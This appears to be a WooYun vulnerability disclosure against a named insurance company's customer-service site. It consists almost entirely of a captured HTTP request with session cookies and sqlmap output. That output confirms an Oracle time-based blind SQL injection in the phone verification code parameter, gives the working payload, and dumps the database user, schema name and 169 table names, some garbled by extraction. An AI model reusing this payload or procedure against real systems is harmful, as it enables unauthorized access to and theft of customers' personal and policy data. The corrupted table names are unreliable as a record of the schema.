WooYun.org

GET /eservice/auth.action?action=confirmAuthcode&sid=Dkp3VhkHyVvHChN27FL0J4cLkyFy56f22Vd7v2JPcQmZTTvyh7Q2!
122181249!328474508!1436673223428&mobile=18888888888&phone_verification_code=123456&operateType=7 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://eservice.95549.cn/eservice/account/register.action?action=initSingle
Accept: application/json, text/javascript, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET 
CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.1)
Host: eservice.95549.cn
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=Dkp3VhkHyVvHChN27FL0J4cLkyFy56f22Vd7v2JPcQmZTTvyh7Q2!122181249!328474508; 
K_V_D_JSESSIONID=aocimmlclhonbojgiielbdhajhfcdiaohjoamielbhoclepkhndlkmnhlmapcjdnbbeeabgaaidg; 
_ga=GA1.2.2127493268.1436673240; _gat=1; __utmt=1; __ghuid=87081851436673240202.1436673240202; 
Hm_lvt_8f5497008cc4aa3ad167a3dc40681432=1436673240; Hm_lpvt_8f5497008cc4aa3ad167a3dc40681432=1436673242; 
__utma=82279902.2127493268.1436673240.1436673240.1436673240.1; __utmb=82279902.2.10.1436673240; __utmc=82279902; 
__utmz=82279902.1436673240.1.1.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/corps/%E5%9B%BD%E5%8D
%8E%E4%BA%BA%E5%AF%BF%E4%BF%9D%E9%99%A9%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8; 
OZ_1U_2108=vid=v5a1e4d8af24b6.0&ctime=1436673301&ltime=1436673241; OZ_1Y_2108=erefer=%20http
%3A//www.wooyun.org/corps/%25E5%259B%25BD%25E5%258D%258E%25E4%25BA%25BA%25E5%25AF%25BF%25E4%25BF%259D
%25E9%2599%25A9%25E8%2582%25A1%25E4%25BB%25BD%25E6%259C%2589%25E9%2599%2590%25E5%2585%25AC%25E5%258F
%25B8&eurl=http%3A//www.95549.cn/&etime=1436673239&ctime=1436673301&ltime=1436673241&compid=2108

sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=18888888888&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=15927548246&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
current user:    'ESERVICE'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=18888888888&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
available databases [1]:
[*] ESERVICE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: phone_verification_code
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: action=confirmAuthcode&sid=s8nMVg7Sf0bYTfpTQzWJKPKQgZFqCS4cLXb1xcGT3fVTz17VFq2n!-29301160!122181249!1436580754408&mobile=18888888888&phone_verification_code=412779' AND 6774=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(111)||CHR(121)||CHR(79),5) AND 'dVhA'='dVhA&operateType=7
---
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
Database: ESERVICE
[169 tables]
+-------------------------------------------+
| EBIZ_DOWNLOAD_HIS\X03                     |
| EBIZ_ORDER!                               |
| EBIZ_ORDER!ACCOUNT                        |
| EBIZ_ORDER_AUTH\X07A                      |
| EBIZ_ORDER_SURRENDER\X02\X02A             |
| EBIZ_PERIOD\\?81C_ORDER\X07\X11           |
| EBIZ_POINT_EXCHANGE_DETAIM\X11A!A\X04\X05 |
| EBIZ_POINT_HISTORY\R1                     |
| EBIZ_PRODUCT_RECOMMEND\X02                |
| EBIZ_P\X7FYOENT                           |
| EBIZ_P\\X7FYOC_OPGRATH                    |
| EBIZ_STATISTICS_HIS_BAK_140609\X19        |
| EBIZ_STATISTICS_RECORD_TEMP\X05\X11       |
| EBIZ_STATISTICS_XISITOY^\R                |
| EBIZ_SY_{ANKS!                            |
| EBIZ_TEL_ACT_PROAA\X05                    |
| EBIZ_TEL_USER_DEPT\X05                    |
| EBIZ_TEL_USER_ROLE!\T                     |
| EBIZ_TEL_\\?81ESERVE                      |
| EBIZ_THIRD_AUTH\X03                       |
| EBIZ_THIRD_TERMINA\\?81ION                |
| EBIZ_THIRD_TRADE_H?S                      |
| EBIZ_USER_BI?DCA\\?81D                    |
| EBIZ_USER_CERTIFY_IMAG\\?81               |
| EBIZ_USER_MERGE\X05                       |
| EBIZ_USER_MERGE_DETAIL\R                  |
| EBIZ_USER_S?BSCRIBE                       |
| EBIZ_USER_SETTIN銡?                         |
| EBIZ_USER_THIR?_INFO                      |
| EBIZ_USER_WEIXIN_I\\?81FO                 |
| EBIZ_VALIDATE_U\\?81L                     |
| EBIZ_WEIXIN_MESSAGE呓                       |
| MAIL_MAIN_A\\?81TAC酄侻ENT_TAB               |
| NETEASY_\\?81HECK_DATA                    |
| ORDER_RECOMMEND\T                         |
| CLOUD_EBIZ_APPNT                          |
| CLOUD_EBIZ_BNF                            |
| CLOUD_EBIZ_IMPART                         |
| CLOUD_EBIZ_IMPART_ITEM                    |
| CLOUD_EBIZ_INSURED                        |
| CLOUD_EBIZ_ORDER                          |
| CLOUD_EBIZ_ORDER_ACCOUNT                  |
| CLOUD_EBIZ_ORDER_INSURANCE                |
| CLOUD_EBIZ_ORDER_RECOMMEND                |
| CLOUD_EBIZ_THIRD_ORDER                    |
| EBIZ_ACCOUNT_AUTH                         |
| EBIZ_ACCOUNT_SECURITY                     |
| EBIZ_APPNT                                |
| EBIZ_APPNT_AUTHORITY                      |
| EBIZ_BATCH_INFO                           |
| EBIZ_BNF                                  |
| EBIZ_CHECKRULEATEMPLATE                   |
| EBIZ_CHECK_BATCH                          |
| EBIZ_CHECK_DETAIL                         |
| EBIZ_CLAIM                                |
| EBIZ_CLAIM_IMAGE                          |
| EBIZ_CLAIM_REPORT                         |
| EBIZ_CODE                                 |
| EBIZ_CONT_ADDPREM                         |
| EBIZ_CONT_MODIFY                          |
| EBIZ_CONT_REBUY                           |
| EBIZ_CONT_RENEWAL                         |
| EBIZ_CONT_RENEWAL_DETAIL                  |
| EBIZ_CORE_INSURANCE_IMPORT                |
| EBIZ_ELEC_CONT                            |
| EBIZ_ELEC_NOTICE                          |
| EBIZ_ID_VERIFY                            |
| EBIZ_IMPART_ITEMA                         |
| EBIZ_IMPARA                               |
| EBIZ_INSURED                              |
| EBIZ_IP_RECORD                            |
| EBIZ_LOGIN_CHECK                          |
| EBIZ_MAIL_SEND                            |
| EBIZ_MESSAGE_EXCHANGE                     |
| EBIZ_MESSAGE_TEMPLATE                     |
| EBIZ_MOBILE_RECHARGE                      |
| EBIZ_MOCUPATION                           |
| EBIZ_OPER_HIS                             |
| EBIZ_ORDER_INSURANCE                      |
| EBIZ_ORDER_PRESENT                        |
| EBIZ_ORDER_REVISIT_DETAIL                 |
| EBIZ_ORDER_REVJSIT                        |
| EBIZ_ORDER_RISM_AMNT                      |
| EBIZ_ORDER_TYPE_PROPERTY                  |
| EBIZ_PERIODIC_PRODUCT                     |
| EBIZ_POINT_ACCOUNT                        |
| EBIZ_POINT_AUDIT                          |
| EBIZ_POINT_EVENTA                         |
| EBIZ_POINT_EXCHANGE                       |
| EBIZ_POINT_GIFT                           |
| EBIZ_POINT_ORDEQ                          |
| EBIZ_POINT_PLATFORM                       |
| EBIZ_POINT_RUYE                           |
| EBIZ_POINT_TASK                           |
| EBIZ_PORTRAY_ATTACH                       |
| EBIZ_PRODUCT                              |
| EBIZ_PRODUCT_CATE                         |
| EBIZ_PRODUCT_CHECKRUAE                    |
| EBIZ_PRODUCT_OCCUPATION                   |
| EBIZ_PRODUCT_PRESENT                      |
| EBIZ_PRODUCT_PROPERTY                     |
| EBIZ_PRODUCT_RATE                         |
| EBIZ_PRODUCT_RATE_DESC                    |
| EBIZ_PUBLIC_ALARM                         |
| EBIZ_PUBLIC_FEEBACK                       |
| EBIZ_PUBLIC_MENU                          |
| EBIZ_PUBLIC_MESSAGE_REMARK                |
| EBIZ_PUBLIC_MESSAGF                       |
| EBIZ_PUBLIC_MSG_EXCHANGE                  |
| EBIZ_PUBLIC_PLATFORM                      |
| EBIZ_PUBLIC_RECEIVE_CONAIG                |
| EBIZ_PUBLIC_SEND                          |
| EBIZ_PUBLIC_USER                          |
| EBIZ_QUESTION_SURVEY                      |
| EBIZ_RECOMMEND_YHANNEL                    |
| EBIZ_RISK_PROPERTY                        |
| EBIZ_STATISTICS_HIS                       |
| EBIZ_STATISTICS_HIS_BAK_150108            |
| EBIZ_STATISTICS_HIS_BAK_150618            |
| EBIZ_ST_BAOKLOCATIONS                     |
| EBIZ_SY_STAQDARDAREAS                     |
| EBIZ_TEL_DEDER                            |
| EBIZ_TEL_DEPZ                             |
| EBIZ_TEL_RETULE                           |
| EBIZ_TEL_ROLE                             |
| EBIZ_TEL_USER                             |
| EBIZ_TELAACTIVITY                         |
| EBIZ_THIRD_ADDPREM                        |
| EBIZ_THIRD_CANT_SYNC                      |
| EBIZ_THIRD_FILE                           |
| EBIZ_THIRD_FOTIFY                         |
| EBIZ_THIRD_ORDER                          |
| EBIZ_THIRD_REFUND                         |
| EBIZ_THIRD_SURRENDER                      |
| EBIZ_THIRD_TRADE                          |
| EBIZ_THIRD_TRADE_BAK                      |
| EBIZ_THIRD_TRADE_BAK_20140220             |
| EBIZ_THIRD_TRADE_BAK_201402301            |
| EBIZ_THIRD_TRADE_BAK_20140917             |
| EBIZ_THIRD_TRADE_BAK_20140917A            |
| EBIZ_THIRD_TRADE_BAK_20150618             |
| EBIZ_USER_HIS                             |
| EBIZ_VALIDATE_CODE                        |
| EBIZ_WEIXIN_MESSAGE                       |
| MAIL_MAIN_ATTACHMENT_TAB_BAK              |
| MAIL_MAIN_TAB_BAK                         |
| MAIL_MAIN_TAB_BAK_20140918                |
| MAIL_MAIN_TAA                             |
| NETEASY_TEMP                              |
| PF_CODE1                                  |
| PF_CPERMISSION                            |
| PF_CROLE                                  |
| PF_CROLECPERMISSION                       |
| PF_CROLECUSTOMERA                         |
| PF_CUSTOMERA                              |
| TEMP_BANKLOCATIONS                        |
| TEMP_TAOBAO1212                           |
| TEMP_TAOBAO1212_YYKH                      |
| TEMP_TAOBAO1212_ZM                        |
| TEMP_UNIONID                              |
| TEMP_YLB_IMPORT                           |
| TEMP_YLB_PRINT                            |
| TEMP_YLB_REVISIT                          |
| TEMP_YLB_REVISIT2                         |
| TOPIC_ACTIVITY                            |
| TOPIC_ACTIVITY_INVOLVE                    |
| TOPIC_ACTIVITY_RECOMMEND                  |
| TOPIC_SNOWY_CHILDREN                      |
| WEIXIN_MAIN_TAB                           |
+-------------------------------------------+